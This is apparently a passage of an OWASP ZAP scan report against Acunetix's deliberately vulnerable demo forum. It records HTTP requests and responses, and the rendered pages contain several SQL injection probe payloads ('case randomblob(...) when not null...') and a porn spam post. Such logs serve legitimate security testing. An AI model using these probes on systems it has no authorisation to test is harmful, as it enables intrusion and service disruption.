<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 280 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:28 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 328 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:30 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 387 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:33 GMT Content-Length: 3635 |
| Response Body - size: 3,635 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 356 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:35 GMT Content-Length: 7002 |
| Response Body - size: 7,002 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:27 GMT Content-Length: 8067 |
| Response Body - size: 8,067 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(10000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>vff6rlo7y9bn4nnpamaw853v9htle2v0zgp8a9prshvwt6b212nzabhqqu</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:34 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(100000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>case randomblob(1000000000) when not null then 1 else 1 end </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:03:35 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>96fduxacxooggw29oks1sj31qik8jry084qbqhychmtl2dt25shmaiaw7oq1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>19595700666655765840479055397029421057109081</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:04 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>00000000000000000000000000000000000000000000</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>11111111111111111111111111111111111111111111</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ZAP</b> on 3/14/2022 8:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ZAP - 59.96.133.206</div><div class='posttext'>99999999999999999999999999999999999999999999</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- 